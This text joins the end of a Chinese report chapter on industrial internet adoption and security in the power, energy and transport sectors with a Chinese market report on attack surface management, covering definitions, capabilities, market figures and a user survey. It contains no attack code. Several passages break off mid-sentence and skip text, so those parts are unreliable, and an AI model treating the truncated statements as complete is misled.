能制造发展规划》,《“十四五”智能制造发展规划》中对我国智能制造的现状与形势、 未来发展的重点任务等方面进行了详细的阐述,其中更是提出到 2035 年相关国家重点 骨干企业基本实现智能化的宏伟目标。 7.2 工业互联网与产业数字化转型 产业数字化转型是利用数字技术进行全方位、多角度、全链条的改造过程,是利用 数字技术破解企业、产业发展中的难题,重新定义、设计产品和服务,实现业务的转型、 创新和增长[10] 。产业数字化转型对推动我国经济高质量发展具有重要意义。 十九大以来,我国不断推动工业互联网创新战略走深走实,与我国的产业发展相互 适应、齐头并进。《工业互联网创新发展行动计划(2021-2023 年)》确立了未来三年 我国工业互联网发展目标:到 2023 年,新型基础设施进一步完善,融合应用成效进一 步彰显,技术创新能力进一步提升,产业发展生态进一步健全,安全保障能力进一步增 强[11] 。目前,工业互联网创新进入高速发展阶段,我国正加快工业互联网与制造业融合 的脚步,充分发挥我国的人才优势、市场优势及制造业优势,深化工业互联网与重点企 业、集团的合作。产学研紧密结合,工业互联网新技术相继落地,在企业维护、工厂监 管、生产技术、销售渠道等方面为企业提供优秀的数字化转型方案。工信部最新统计数 据显示,截至 2022 年上半年,工业互联网高质量外网覆盖全国 300 多个城市。“5G+工 业互联网”全国建设项目 2022 年第二季度新增 700 个,累计已超过 3100 个。(数据来源[12]) 如今,工业互联网平台已经成为产业升级的关键组成、数据交互的集散地、政府与 产业的沟通桥梁、拓展市场的重要途径。近年来,工业互联网带动国民经济迅猛发展, 影响力显著提高。至 2022 年 8 月,工业互联网已经全面融入 45 个国民经济大类(数据 来源[12]) ,工业互联网实现了产业的增速增效,也助推了全产业链的协同高效运转,是 实现产业链数字化和智能化的基础。工业互联网创新逐渐成为我国产业数字化转型升级、 建设制造强国和构建发展新格局的主要切入点,为推动经济高质量发展提供动力。 现阶段,工业互联网还需要融入更多行业,巩固跨界合作,提高深度与广度,为其 他行业提供技术、方案支持,推进产业数字化全面向好发展。在未来,工业互联网创新 将会继续带动我国产业的迭代创新,提升我国产业的核心竞争力。 7.3 工业互联网与典型工业环境 7.3.1 工业互联网与电力行业 电力系统作为重要的工业基础设施之一,便利了人民日常生活,也对社会稳定起到 重大作用,由于电网系统的脆弱性和低攻击容忍性,一旦电力系统受到攻击,会对国家 安全,人民安全产生巨大威胁。一些不法分子通过网络攻击来损害电网系统达到扰乱社 会的目的。2019 年 3 月,黑客组织利用电力系统漏洞对美国可再生能源电力 SPower 公 司发动 DDos攻击,攻击导致控制系统与太阳能和风力发电设备之间通讯中断。2020 年, 巴西电力公司 Light S.A 遭黑客入侵系统,并被勒索 1400 万美元的赎金。 随着信息化电网的建设,各种电力设备以网络为媒介互联互通,工业控制系统的开 放程度越来越高,在为工业生产带来极大推动的同时,也减弱了电力工业控制系统与外 界的隔离,致使外界攻击者可以通过互联网来攻击电网。 图 7-2 电力工业控制系统的安全防护体系[13] 2009 年我国正式提出“智能电网” 的概念,意图建设信息化,自动化的坚强智能电网, 近年来已经成为了国家电网的主要发展方向。2022 年 7 月,发改委、住建部印发《“十 四五”全国城市基础设施建设规划》,其中提到开展城市韧性电网和智能电网建设。 智能电网也被称作“ 电网 2.0” ,是电网的智能化,是世界电力产业发展的体现,也 是新能源发展实施的重要基础,具有智能化的信息架构,通过先进的测量技术、控制方 法、决策系统,可以为人民提供安全、经济、环保的电力服务,其应具有高度的可自愈 性,抵御攻击以及满足所有用户的用电需求。 随着工业互联网和传统电力系统的发展融合,需要加大对电网安全问题的注意,时 刻防范针对电网的恶意攻击,守护国家安全。 7.3.2 工业互联网与能源行业 能源产业是国民经济的重要基础工业,关系到国家战略储备,百姓日常生活。“重 资产、资源型” 的特点决定了其实践工业互联网的必要性和创新性。能源行业在自动化、 信息化等方面已经有了一定程度的普及,PLC 、传感器、DCS 等较为完善[14]。 能源行业连续生产需要设备高可靠、安全运行,通过技术手段优化运行效率、实现 节能降耗更是核心的工业需求[14]。工业互联网能够有效地满足上述需求,通过实时监测 设备状态从而保证设备的可靠性、易控制性,设备不间断运行产生海量的工业时序数据 在分析故障、分析产能以及分析能耗等方面起到重要的作用。 石油被称为工业血液,是国家生存和发展必不可少的资源。从当前形势来看,石油 行业在满足其他行业对于石油需求的同时,得到的经济效益是有限的。此外,在“双碳” 背景下,如何在石油开发中减少碳排放实现绿色开发,也是一个值得考虑的问题。工业 互联网的引入能够有效地节约石油行业中的物耗成本、人员成本、时间成本,进而提高 石油行业的经济效益。同时,对于设备的实时监测可以实现排污主动处理,从源头上解 决部分的污染问题。因此,与工业互联网结合是越来越多石油企业的必然选择。 工业互联网的高速发展推动煤炭行业生产管理方式改革,并为煤炭行业发展助力。 我国煤炭行业的变革已经从机械化走向了今天的自动化,但这并不意味着我国煤炭行业 已无发展空间,各系统间协同合作程度低,不同技术难以整合等问题的解决需要工业互 联网的支持。工业互联网的应用可实现实时掌控作业环境情况、提高设备工作效率、保 障矿井工人安全等。但就目前来看,我国煤炭工业互联网还处于前期,未来技术创新、 与煤炭行业适配任重而道远。 在新能源迅速发展的背景下,工业互联网的价值得到进一步地体现。构建新能源体 系不仅是社会主义现代化强国的必然要求,同时对实现“双碳” 目标意义重大[15] 。然而, 新能源开发利用仍存在一些制约因素,比如新能源各类设备种类杂、多系统间存在数据 壁垒等问题[16],这与工业互联网的主攻方向恰恰契合。工业互联网的应用能够通过设备 的自我监测和报备,将以往设备定期维护和检修转向预防为主的维护方式,从而降低了 设备突发宕机的概率。此外,当设备发生故障时,工业互联网能够通过实时数据上报, 快速定位告警、故障节点,达到缩短维修周期的效果。 纵观整个能源行业,工业互联网在实现降低能耗、智能管理、提高效率,最终达到 降本增效的过程中起到至关重要的作用。但也因此,能源行业成为网络攻击重灾区,随 着与工业互联网合作的持续深入,越来越多的网络安全问题也会接踵而至。所以,在能 源行业应用工业互联网的过程中,需要考虑可能存在的网络安全问题以及注重网络安全 防护。 7.3.3 工业互联网与交通行业 工业互联网快速发展,逐渐与传统工业行业进行融合旨在推动传统工业向数字化与 智能化方向转化,在交通基础设施建设行业也有所体现。在工业互联网的辅助下,交通 基建企业可以设计协同管理等应用来提高施工质量、生产安全水平等,将工业互联网融 合至工业生产过程以及运行管理模块,利用新型信息技术弥补传统工业模式上的不足, 提高企业整个生产的效率并保障生产过程的安全。 在城市交通的地铁领域中,工业互联网已应用于地铁综合监控系统的搭建,该系统 包含中央综合监控系统以及车站综合监控系统,并由综合监控系统骨干网连接而成。中 央综合监控系统致力于保证交通各线路上的各车站的各个子系统都能够处于正确的运 行状态并正确实现中心级下达的操作控制功能指令,该系统被安装于线路控制中心处; 车站级监控网则是具有双冗余高速交换特点的以太网 ,其数据传输速率可以高达 100Mbit/s 或 1000Mbit/s 。图 7-3 则为一个典型的综合监控系统架构示例图,该系统构建 在广域网上,也是地理分散的大型 SCADA 系统。 图 7-3 典型的综合监控系统架构图[17] 随着工业互联网在交通领域的快速发展,其也存在着安全责任边界模糊、安全防护 意识不足等问题。因此在交通工业环境中,解决城市轨道交通信息系统、地铁综合监控 系统以及公交管家系统等的安全问题的意识在不断增强,解决措施也在不断完善。以城 市轨道交通信息系统为例,在工业互联网的介入后,该系统需要着重对防病毒软件以及 防火墙这两个安全设备进行加强防护,并注意及时升级防病毒软件的病毒库,以防出现 恶意病毒入侵、系统外的非授权访问等一系列网络安全问题。 工业互联网应用在交通领域后,可以实现行业数据共享交换、地铁运行自动化以及 智能化等,推动了这个领域的发展以及进步。与此同时,使得该领域也面临一定的信息 安全风险,例如网络安全责任边界不清晰、信息泄露以及数据窃取风险增加、工业互联 网设备长期遭受恶意攻击、工业互联网软件设备更新慢以及漏洞无法及时修补等安全风 险。因此,在提高网络安全意识以及技术的基础上,也需要不断根据实际情况来拟定和 出台相关战略或有针对性的信息安全政策来辅助解决一系列潜在或待解决的信息安全 的问题。 2022 年党的二十大报告对推进新型工业化、构建现代化基础设施体系做出重大战略 部署。工业互联网作为构建工业环境下人、机、物全面互联的关键基础设施[18] ,已经连 续五年写入政府工作报告,被明确为重点发展的任务之一,加强工业互联网安全防护的 重要性日益凸显。为贯彻落实《中华人民共和国网络安全法》等法律法规,国家标准化 管理委员会发布了《信息安全技术 关键信息基础设施安全保护要求》。同时,我国在 2022 年相继推出了一大批工业互联网信息安全相关的政策法规及报告,以保证工业互联 网高质量发展。 随着工业互联网应用范围的不断扩大,工控领域面临的安全风险不断增加。2022 年工控安全事件频发,各类网络攻击威胁持续上升。这些攻击行为涉及到各行各业,给 个人、企业、国家带来了不同程度的损失。值得注意的是,针对关键基础设施的攻击呈 现上升态势,加强关键基础设施安全工作刻不容缓。基于以往的工控安全形势,工控系 统行业漏洞数量呈逐年下降的趋势。相比于 2021 年,全球在工控设备暴露数量方面的 排名除前两名外发生了较为明显的变化,各国工控设备暴露数量有所回升。通过威胁情 报和蜜罐数据的关联分析,进一步体现了威胁情报在工控网络安全领域中具备极高的应 用价值。 万物互联时代,工业互联网的发展与普及无论从政策制定层面还是实际落地层面都 得到了国家的大力支持。建立安全保障体系,提高安全防护水平,对工业互联网的创新 发展具有重要意义。在未来,工业互联网将持续为智能制造与产业数字化转型赋能,促 进与各行业的融合创新应用,为推进新型工业化、构建现代化基础设施体系提供强劲动 力。
standards
前言 “攻击面管理”是 2022 年中国网络安全产业热度上升比较快的词, 过去从事网络资 源探测、漏洞管理、自动渗透测试工具产品研发的公司纷纷推出自己的攻击面管理产品, 或给自己打上“攻击面管理” 的标签。数说安全为此分别做了供给侧、需求侧调研, 试图 搞清楚大家口中的攻击面管理到底是什么, 攻击面管理在用户安全防线中定位是什么, 其 核心技术与能力是什么, 各厂商的技术差别与产品定位是什么, 各甲方单位的攻击面管理 工作的痛点是什么, 建设进度如何, 以及通过数说安全商业分析平台对攻击面管理相关项 目情况进行了分析,给出了攻击面管理市场的总结与展望。 最后, 对从事攻击面管理的 26 家国外厂商及 21 家国内厂商做了分析和总结, 并展示 了其中 9 家国内厂商的解决方案与案例。 网络攻击面是指黑客或攻击者在攻击时所能利用的网络漏洞和安全弱点的总和, 对于 组织而言,管理网络攻击面是保护网络安全的重要措施之一。 网络安全攻击面管理是对组织的网络资产进行全面分析, 识别所有攻击者可能利用的 漏洞和安全弱点, 然后制定相应的防御措施和补救措施的过程。其目的是为了提高网络安 全防御的有效性和韧性,以保护组织的网络资产免受各种威胁和攻击。 技术视角 1: EASM 和 DRPS 从产品技术、客户需求和应用场景来看具备一定的共通 性和互补性, 当前大部分 EASM 厂商通过自研或外购的形式整合了 DRPS 能力来提升产品 竞争力, EASM 和 DRPS 的融合已经在市场中体现。 技术视角 2: EASM 可以作为 CAASM 在暴露面发现阶段的能力进行补充,同时完善 内外网资产关联分析来挖掘更深层次的攻击面风险。随着厂商的技术能力增强, 客户的需 求度提高, CAASM 和 EASM 未来发展趋势将融合为一个平台来应对不同的应用场景。 技术视角 3:目前企业安全建设仍以内网安全为第一优先级,随着数据要素市场发展, ; 企业数据使用与流通加速, 对于企业外部 IT 资产与数据风险, 特别是针对敏感信息泄漏等 情况, EASM 将是很好的能力补充。 资本视角 1(并购):最近 3 年国外攻击面管理市场并购交易保持活跃, IT 巨头(IBM 、 Micrsoft、Google)和安全巨头(Palo Alto、CrowdStrike)通过收购 EASM 厂商, 在现 有产品上快速扩展对企业外部攻击面发现与管理的能力。但近 3 年还没有看到 CAASM 方 向的并购。国内攻击面管理市场并购交易发生过两起: 1、360 并购数字观星, 将后者的企 初创企业(未岚科技、云科安信、零零信安等),赛道整体仍处于爬升期。 市场视角: 狭义的攻击面管理市场主要指客户采购明确的攻击面排查、网络资产测绘 及管理、威胁情报获取等攻击面管理产品及服务形成的市场, 目前我国狭义攻击面管理市 场正处于起步阶段 。广义的攻击面管理市场应包含可纳入该领域的所有安全产品及服务, 例如漏洞发现与管理、网络资产测绘及管理、威胁行为检测、攻击链路绘制、风险评估、 优先级评估及排序、响应处置等领域, 2022 年广义攻击面管理市场规模约 26 亿元。 (二) 推荐 甲方单位网络安全与风险管理负责人应当: u 考虑采用攻击者视角重新审视自己的网络安全防御方案, 发现防御的盲区, 重新 调整防御的优先级; u 攻击面管理的部署顺序考虑 EASM 与 DRPS 服务先行, CAASM 跟上; u 中小企业考虑采用相对低成本的 EASM,大型企业应考虑 EASM、CAASM、DRPS 整合解决方案; (一) 攻击面管理的起源 2018 年, Gartner 敦促安全领导者开始减少、监控和管理他们的攻击面, 作为整体 网络安全风险管理计划的一部分,并且在 2021 年发布的《Hyper Cycle for Security Operations ,2021》中将攻击面管理(ASM ,Attack Surface Management)相关技术 定义为新兴技术, 这被大家公认为是“攻击面管理”这个名词做为一种网络安全产品类别 的起源。 (二) 攻击面是什么? 美国国家标准与技术研究院(NIST)对攻击面的定义是: “位于系统、系统组件或环 境的边界上的一组入口,攻击者可以从这些入口尝试进入、产生影响或从中提取数据。 ” ( The set of points on the boundary of a system, a system element, or an environment where an attacker can try to enter, cause an effect on, or extract data from, that system, system element, or environment. )。 攻击面是所有可从 Internet 访问的处理或存储数据的硬件、软件、SaaS 和云资产, 将其视为网络犯罪分子可用于操纵网络或系统以提取数据的攻击媒介的总数。 攻击面包 括: u 安全或不安全的资产 u 已知或未知资产 u 影子 IT u 活动或非活动资产 u 托管和非托管设备 u 硬件 u 软件 u 软件即服务(SaaS) 的范围内。其他名称包括外部攻击面和数字攻击面。 来源:未岚科技 图 1:攻击面的组成 (三) 攻击面管理是什么? 不同机构对攻击面管理的定义略有区别,但大同小异。 IBM 对攻击面管理的定义: 攻击面管理 (ASM) 是对构成组织攻击面的网络安全漏洞 和潜在攻击向量的持续发现、分析、修复和监控。 Michael Cobb 对攻击面管理的定义: 攻击面管理是对组织的 IT 基础设施的持续发 现、清点、分类和监控。 Cycongnito 对攻击面管理的定义: 攻击面管理是发现、分类和评估组织所有资产安 全性的持续过程。 CrowdStrike 对攻击面管理的定义: 攻击面管理是对组织 IT 基础架构内的攻击媒介 进行持续发现、监控、评估、优先排序和补救。 Mandiant 对攻击面管理的定义: 在当今的动态、分布式和共享环境中发现和分析互 联网资产, 持续监控已发现资产的风险敞口, 并使情报和红队能够实施风险管理并为风险 管理提供信息。 Palo Alto Networks 对攻击面管理的定义: 攻击面管理 (ASM) 是持续识别、监控和 管理所有内部和外部互联网连接资产以发现潜在攻击向量、暴露和风险的过程。 国内的赛迪顾问在《中国攻击面管理市场研究报告, 2022》中将攻击面管理定义为: 攻击面管理是一种从攻击者的角度对企业数字资产攻击面进行检测发现、分析研判、情报 预警、响应处置和持续监控的资产安全性管理方法。 数说安全综合以上各方的定义, 结合对攻击面管理工作的要点, 对攻击面管理的定义 为: 攻击面管理 (ASM) 是持续发现、分析、监控和评估内部和外部资产以发现潜在暴露 面、 攻击向量和风险,并进行优先排序、响应处置的过程。 《信息安全技术 关键信息基础设施安全保护要求》中的“收敛暴露面”就是攻击面管 理的目的之一。 (四) 攻击面管理解决的主要问题是什么? 帮助防御者发现自己的盲区: 由于思维方式和所拥有的技术技能的不同, 攻击者与防 御者往往会存在视角上的重大不同,人不可能对自己认知范围之外的事情做出有效应对, 引入攻击者视角, 将会很大程度上帮助防御者发现自己所忽略的, 或视野之外的安全威胁。 帮助防御者合理排定工作的优先级: 防御者的工作是纷繁复杂的, 所拥有的资源也是 有限的, 需要对防御工作进行优先级排定、做出取舍与折衷, 攻击者视角可以帮助防御者 有针对性的防御,提高资源利用效率。 攻击面管理是一个多能力交叉的复合型领域, 涵盖了资产、漏洞、攻防、情报、大数 据分析等多个维度, 这些特性之间存在较强的依赖关系, 因此每个能力的缺失或薄弱都会 对产品实际效果产生影响。举例来说, 如果不能全面获得资产的可见性, 攻击面的发现与 收敛就会存在盲区, 而如果兼顾了资产, 但攻击者视角不够真实, 风险评估的结论也会存 在局限性,导致防御资源调配不合理甚至错误。 从技术角度看, 一个优秀的攻击面管理方案需要多维深厚能力的加持, 而对于上面这 些能力项,放在当前国内市场中无一不可撑起一条单独的赛道, 需要的是长时间的技术打 磨与积累。因此,对于在国内尚处于技术萌芽期的攻击面管理领域来说,无论 CAASM、 EASM 还是 DRPS,国内供给端厂商大部分呈现出能力分散、各有所长的局面。 从技术角度分析,攻击面管理的核心能力,至少应该包含以下 6 个方面: 1. 资产管理能力: 通过主动式扫描、网络流量解析、第三方应用集成、数据爬取、主 机代理等多种方式, 识别企业 IT 资产和数字资产的过程。良好的资产管理能力将有助于企 业管理者获得对资产全面的可见性, 是攻击面发现与收敛的重要前提。资产管理的主要特 性包括: u 资产发现能力: 通过多种手段发现企业内、外部的 IT 资产与数字资产。 l 互联网资产发现能力:通过网络空间测绘、数据爬取等技术发现企业在互联网 上存在的资产, 包括但不限于 IP、域名、 Web 应用、云应用、移动应用、物 联网等已知和未知资产; l 内网资产发现能力:通过主动式扫描、网络流量解析、第三方应用集成等技术 发现企业内部的资产, 包括但不限于已使用的 IP/端口/服务/证书、主机、服 务器、网络与安全基础设施、IT 应用与业务系统、开源组件、API 应用、BYOD 设备、供应链等已知和未知资产; l 恶意资产发现能力:对网络钓鱼、应用仿冒、品牌侵权等恶意资产欺诈风险的 监测能力; u 资产信息整合能力: 通过对多种来源的资产信息进行聚合分析(信息来源可信度 比较、信息去重、信息富化、唯一性判定、资产标签化等) ,构建资产间和资产 与业务间的关联关系, 形成可视化视图, 并对资产状态(上下线、权属变更) 进 行监控; 2. 脆弱性管理能力:通过漏洞扫描、对接第三方扫描器、自动化渗透测试/BAS、基 线扫描等多种方式, 对企业的暴露面进行脆弱性检测, 找到企业暴露面中的弱点, 发现潜 在的攻击路径, 并对风险的优先级进行排序, 推动防御体系的优化。脆弱性管理的主要特 性包括: u 基于指纹的漏洞发现能力: 对匹配到指纹特征的资产进行漏洞扫描, 而不是全网 探测方式,提高漏洞检出效率,进一步达到无损扫描效果; u 基于 POC 的漏洞发现能力: 基于 POC(漏洞验证程序) 或者 EXP(漏洞利用程 序) 等方式去发现漏洞的能力, 保证漏洞检测的准确性和真实性, 减少系统资源 消耗和带宽占用; u 敏感信息泄露发现能力: 通过对互联网邮件、网盘、文库、github、深网暗网等 渠道的数据获取,识别出企业泄露的敏感信息,并发出警报; u 威胁评估能力:通过不同的攻击向量探测资产可能面临的威胁, 主要以漏洞为主, 并结合弱口令、配置错误、网络钓鱼、不当权限等其它弱点识别方式; u 威胁优先级评定能力: 全面评估威胁风险后结合 CVSS 或 VPT 技术, 以攻击者视 角推演潜在的攻击路径,给出高优先级的风险清单; u 补丁管理能力: 提供从漏洞发现到处置的闭环管理机制; 3. 情报能力: 通过引入威胁情报、漏洞情报以及数字情报等能力, 扩大对企业风险面 的识别; 4. 渗透测试能力: 组织能够对自身网络资产进行渗透测试, 模拟攻击者的攻击行为, 识别和评估网络安全防御的有效性和韧性; 5. 攻击防护与缓解能力: 通过对外交互接口,实现攻击面风险闭环管理,包括但不 限于与 SOC/SIEM/SOAR/XDR 等系统集成或提供可被调用的 API 接口; 6. 安全意识和培训能力: 社会工程学攻击的对象是组织中的人,组织为员工提供相 关的网络安全培训和意识提升,帮助员工提高对网络安全的认识和防范能力。 攻击面管理在整体防御体系中的定位与核心价值 结合滑动标尺模型和网络防御矩阵 CDM 模型(https://cyberdefensematrix.com), 综合分析攻击面管理(CAASM/EASM/DRPS)的定位与价值: CAASM 技术处于滑动标尺模型的“积极防御” 阶段,其建设优先级与 SOC、 SIEM 、XDR 等运营平台相同。加入人工参与,对网络内部威胁进行监控、响应、知识总 结与沉淀,对防御体系进行持续完善。 EASM 、 DRPS 技术处于“威胁情报” 阶段,基于积极防御阶段的运营平台建设, 加入组织面向互联网的资产数据和可在攻击发生期间被利用的缺陷情报总和。 胁检测和事件响应方面取得了进步。在处理较熟悉的已知攻击过程中,有助于降低平均 检测时长(MTTD)和平均响应率(MTTR)。但在面对复杂或者未知攻击过程中,因为 缺少业务访问的上下文关系或剧本编排,安全运营中心下的团队及工具不会自动响应及 处置,将任由流量穿行在网络当中。理想的攻击面管理技术通过对环境变化的自动跟踪 和评估,可以了解环境的全面、准确、最新的视图。有了对资产、上下文以及它们之间 关系的细粒度的理解,组织可以利用自动化运营,进一步降低 MTTD 和 MTTR。 (二) 市场维度 CAASM 与 EASM 的整合 从技术角度来看, CAASM 与 EASM 的主要区别在于暴露面发现(资产识别方式和资 产识别类型)及产品形态(私有化和 SAAS)。 CAASM 的资产识别方式主要以对接第三 方资产系统+主动扫描,资产识别类型主要以内部资产为主,产品形态主要为私有化部 署。而 EASM 的资产识别方式主要是主动扫描和数据爬取,资产识别类型主要以互联网 资产为主,产品形态主要为 SAAS 部署。在脆弱性检测、攻击面分析和风险处置等攻击 来,随着攻击面管理厂商的技术能力增强,客户的需求度提高, EASM 可以作为 CAASM 在暴露面发现阶段的能力进行补充,同时完善内外网资产关联分析来挖掘更深层次的攻 击面风险, CAASM 和 EASM 将会融合为一个平台来应对不同的应用场景。 EASM 与 DRPS 的融合 无论从产品技术、客户需求和应用场景来看, EASM 和 DRPS 都具备一定的共通性 和互补性。当前大部分 EASM 厂商通过自研或外购的形式也都已经整合了 DRPS 能力来 补足产品的竞争力,适应更广泛的客户需求。 EASM 和 DRPS 的平台化融合已经在市场 应用中逐步体现。 (三) 产业维度 国内网安产业现状对攻击面管理技术发展的影响 从我国网安产业发展历程来看,等保制度实施 16 年+ ,网络安全法实施 6 年+ ,大多 数企业已经完成了以合规为驱动的安全体系建设,将逐步进入到深耕细作、持续安全运 境。从产品具体细节的对比来看,例如在资产数据采集中,国外产品大多采用第三方应 用集成的方式,而国内则多以主被动扫描为主,虽然从产品部署的灵活性、对资产识别 的精细度和有利于技术长远发展的角度来看,应用集成是更经济的方式,但受限于国内 封闭的生态环境,各厂商不得已只能将其作为一种辅助手段,只是在项目需要时被动实 施。仅从应用集成的数量对比来看,国外主打 CAASM 方向的 Axonius 宣称已集成了 550 个常见应用,而国内在这方面比较突出的厂商,包括 360 数字安全、华云安、魔方 安全、雾帜智能,其集成的应用数量不超过 100 个。 综上,国内攻击面管理市场的发展离不开网安产业和生态的进步。 在合规时期,单 打独斗或许是一种常态,但进入到主动防御、动态防御、体系化防御的新时代,无论是 攻击面管理、还是 XDR 、SOC/SIEM、零信任这类对底层能力广度和深度有较高要求的 技术整合型领域, 单一厂商很难做到面面俱到,只有坚持共创共享的发展理念,推动生 态环境开放,引导产业协同创新 ,才会使各厂商更专注在自身核心竞争力的打造上 ,而 快构建我国数据基础制度,激活数据要素潜能,做强做优做大数字经济,增强经济发展 动能的新目标 。意见印发不到一个月后,工业和信息化部、国家互联网信息办公室等十 六部门联合印发了《工业和信息化部等十六部门关于促进数据安全产业发展的指导意 见》,明确指出了数据安全产业的发展任务,即从供给侧为保障国家数据安全提供技 术、产品和服务支持,助力数据要素市场培育和价值释放,夯实数字中国建设与数字经 济发展。通过以上不难看出,数据安全已经不再像网络安全那样孤立存在,对于未来数 字经济的长期发展来说,数据安全已成为了促发展、保发展的必要基础之一。 传统的数据安全技术主要包括了数据库安全相关、数据泄漏防护、数据脱敏,新技 术包括了数据分类分级、隐私计算、数据安全管控平台。这些技术主要面向企业内部管 理者视角,即在清楚企业内部有哪些数据应用和数据资产的前提下,对其进行加固和防 护,对于未知或不可见的数据应用与资产则无法起到保护作用。如果数据流转到企业外 部以后,数据可见性和可控性的问题可能会变得更糟糕,特别在互联网风险面中,涉及 企业敏感信息、源代码数据、机密文档、个人隐私信息等数据的泄漏,很难通过传统内 网的数据安全手段进行监测和管理,这也是目前企业数据安全建设中容易被忽视的问 题。如何构建内外兼顾的数据安全整体方案 ,攻击面管理可以做相应能力的补充,其价 值可凸显在下述 3 个方面: u 通过 EASM 、 DRPS 方案, 补充企业外部互联网数据风险监测的能力,对邮 件、网盘/文库、 github 代码平台、深网暗网等渠道泄漏的企业敏感信息、业 务账号、源代码等数据资产进行识别; u 通过 CAASM 提升企业管理者对内部数据应用与资产的风险识别能力, 进一步 加强对承载数据资产的 API 资产、移动资产、业务资产、未知和隐藏资产的发 现和防护能力,提高数据安全防护体系的健壮性; u 提高企业数据安全整体能力, 改变被动防御和静态防御的态势,通过引入攻击 者视角和辅助对抗手段,推动安全关口前移,向积极防御、动态防御模式转 变。 我国的攻击面管理市场还处于早期阶段,大多数用户的注意力仍然停留在漏洞发现 与管理、资产发现与管理、威胁情报、攻击模拟等单体能力建设与完善方面,只有少量 客户将这些领域综合起来,形成相对全面的攻击面防护与管理建设。长期来看, 随着用 户需求和厂商技术、 产品的不断提高,漏洞扫描和管理、 网络资产测绘与管理市场、威 胁情报、模拟攻击等市场将不断汇集融合,纳入到攻击面管理领域。 我国攻击面管理的热度不断提升, 2022 年受疫情影响,相关项目的采购数量与上年 基本持平,但项目的采购平均规模明显提升,专项项目的比重也从 2021 年的 10.3%增 长至 2022 年的 12.7%,用户对攻击面管理的重视程度不断提升。 图 3:2018 年-2023 年 3 月攻击面管理采购热度趋势 攻击面管理客户近三年的行业分布中, TOP5 行业占整体比重的 81.3%,分别是政 府、 教育 、 医疗卫生、公检法司和电信(见图 2020-2022 年攻击面管理项目分布); 但 在专项项目采购的行业分布中,金融和电信行业占比明显提升(见图 2020-2022 年攻击 面管理项目分布(专项)),说明这两个行业对攻击面管理的重视程度较高,以攻击面 单独立项的项目占比较多;而政府、教育、医疗卫生、公检法司行业中的大部分客户对 攻击面管理 ,采购网络安全产品仍是主要形式,对运营工作的重视程度仍有待提高。 整体 图 4:2020-2022 年攻击面管理项目行业分布 2020-2022 年攻击面管理项目采购的 TOP20 关键客户如下图所示: 图 5:2020-2022 年攻击面管理项目 TOP20 客户词云 目前采购攻击面管理相关产品的年采购客户数量不足一万, 随着用户对网络安全运 营的更加重视,攻击面管理市场的不断融合汇聚,客户采购数量和单价不断增加,作为 网络安全运营平台重要组成部分的网络安全攻击面管理市场将会持续快速增长。 (人民币亿元) 50 40 30 20 10 0 2020 2021 2022 2023E 2024E 2025E 数据来源: 数说安全 CSRadar 商业分析平台 图 6:2020-2025 年中国网络攻击面管理市场规模及预测(亿元) 根据数说安全 CSRadar 商业分析平台对上述市场的综合数据统计,广义口径上, 2022 年我国攻击面管理市场规模约 26 亿人民币,同比增长约 8%,随着网络安全运营 的兴起以及对攻击面管理的认知,未来三年的年均增速预计会到 20%左右, 2025 年广义 的攻击面管理产品和服务的市场规模有望达到 45 亿元人民币。 数说安全联合安在新媒体做了《2023 中国网络安全市场攻击面管理产品用户调研报 告》, 针对国内近百家甲方企业,从企业背景、企业自身 IT 与网络安全管理现状、攻击 面管理产品与用户需求匹配度、攻击面管理产品用户实际使用情况、攻击面管理产品未 来投入等多个方面进行了调研,最终得到结果如下: (一) 关键发现 n 漏洞扫描、漏洞与补丁管理、网络资产管理仍是作为目前企业发现与管理自身攻 击面的最主要产品,采购专业 CAASM 和 EASM 产品的用户比例仅为 11%和 15%,市场渗透率远低于传统安全产品。 n 不同于传统安全产品以合规导向为主,攻击面管理产品由技术与合规双轮驱动, 现有能力无法持续监测攻击面的变化、符合监管或审计要求是目前企业实施攻击 面管理的两大最主要因素。 n 超过 50%以上的企业认为 IT 资产管理和未知资产发现上存在不足,而认为满意 的企业比例仅为 15%和 11%,良好的资产发现与管理仍是企业目前亟待解决的 核心问题。 n 办公网、数据中心、公有云、私有云是企业 IT 资产分布最主要的区域,并且有 60%的企业认为目前攻击面扩大的首要原因是将数据和资产转移到云端,因此, 未来云上资产识别与管理将成为企业 IT 风险管理中新的关注重点。 n 全面的资产可见性与动态管理、漏洞发现与优先级管理,这两项能力,既是产品 功能层面用户最关注的两个主要特性,也是用户认为现有产品最主要的两个不 足。 n 对于攻击面管理产品来说, 94%的企业选择将预算投入控制在百万以内,而在这 部分企业中,有 70%认为预算将不超过五十万。 (二) 企业背景 被调研企业所属 TOP3 行业分别是: 金融(21%)、互联网公司(19%)、商业企业 (15% )。 图 7:被调研企业所属行业 被调研企业的 TOP3 类型分别是:私营企业(48%)、央国企(29%)、外资企业(13%)。 图 8:被调研企业类型 被调研企业安全管理团队 TOP3 规模分别是: 5 人以下(34%)、 6-10 人(27%)、 11-20 人(16%),另外有 8%的企业无专职网络安全人员。 图 9:被调研企业安全管理团队规模 企业 IT 资产分布最多的 3 个区域分别是: 办公网、数据中心、公有云。 图 10:被调研企业 IT 资产区域分布 企业 IT 资产管理能力:有 52%的企业认为没有或只有较弱的资产管理能力;只有 15% 的企业认为可以将资产管理系统与 SOC/SIEM/SOAR 系统进行有效整合,赋能安全运营。 图 11:被调研企业 IT 资产管理能力自我评价 企业未知资产发现能力: 有 58%的企业认为存在较大不足;只有 11%的企业认为可 以很好的发现未知资产。 图 12:被调研企业未知资产发现能力自我评价 组织攻击面不断扩大, 企业认为最主要的 3 个原因是: 将更多的数据和资产转移到云 端、组织中影子 IT 的增加、更多设备被添加到需要资产管理的组织; 图 13:被调研企业攻击面扩大的原因 企业通过资产识别与漏洞发现, 实现攻击面管理,购买最多的 3 个产品是: 漏洞扫描 产品(79%)、漏洞与补丁管理系统(60%)、网络资产管理系统(47%)。而对于 CAASM 和 EASM,已购买的比例仅有 11%和 15%。 图 14:被调研企业管理攻击面的主要产品 (四) 攻击面管理产品与用户需求的匹配度 驱动企业实施攻击面管理的最主要 3 个原因是: 现有能力无法持续监测攻击面的变化 (68%)、符合监管和/或审计要求(65%)、难以发现企业外部的新 IT 资产(55%); 图 15:被调研企业实施攻击面管理的驱动力 如果选购攻击面管理产品,企业最关注的 3 个功能特性是: 动态监控和警报 IT 资产 状态的变化(58%)、整个企业 IT 资产盘点、整合和分类(53%)、集成漏洞管理和优先 级(45%)。 图 16:被调研企业关注攻击面管理产品的主要功能特性 企业对现有 CAASM 产品的满意度: 有 47%的企业对已购买的 CAASM 产品不满意, 主要原因是资产管理、漏洞发现、漏洞优先级排序方面不能满足企业要求。仅有 13%的企 业对已购买的 CAASM 产品满意,而另有 